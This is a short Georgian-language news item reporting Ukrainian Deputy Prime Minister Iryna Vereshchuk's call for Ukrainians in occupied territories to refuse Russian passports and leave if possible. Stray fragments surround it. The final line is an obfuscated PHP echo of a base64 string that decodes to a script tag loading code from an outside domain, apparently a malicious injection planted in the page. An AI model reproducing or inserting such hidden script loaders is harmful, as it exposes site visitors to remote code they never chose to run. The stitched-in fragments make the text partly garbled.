celsiusi
ავერსი შნაიდერი
უკრაინის ვიცეპრემიერი და დროებით ოკუპირებული ტერიტორიების რეინტეგრაციის მინისტრი ირინა ვერეშჩუკი მოუწოდებს უკრაინელებს, რომლებიც დროებით ოკუპირებულ ტერიტორიებზე არიან, არ აიღონ რუსული პასპორტები და თუ ეს შესაძლებელია, დატოვონ ოკუპირებული ტერიტორიები. ინფორმაციას უკრაინული მედია ავრცელებს. 
 
ვერეშჩუკმა აღნიშნა, რომ უკრაინის ყველა ტერიტორია ნებისმიერ შემთხვევაში გათავისუფლდება, მაგრამ რუსული პასპორტი გრძელვადიან პერსპექტივაში უფრო მეტ პრობლემას მოუტანს მათ, ვიდრე სარგებელს.
 
ვერეშჩუკი  თვლის, რომ ეს ომი შესაძლოა მოსალოდნელზე ხანგრძლივი აღმოჩნდეს:
 
"ჩვენ არ დავთმობთ ჩვენს მიწას. ჩვენ ვიბრძვით ამისთვის და დავიბრუნებთ. ასე რომ, შესაძლოა ეს ომი იყოს იმაზე სისხლიანი, ვიდრე წარმოგვედგინა." წერს ვერეშჩუკი. 
 
ცნობისთვის, არსებული ინფორმაციით,  რუსეთი უკრაინის დროებით ოკუპირებულ ზაპოროჟიეში რუსული პასპორტების გასაცემას გეგმავს.
707
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");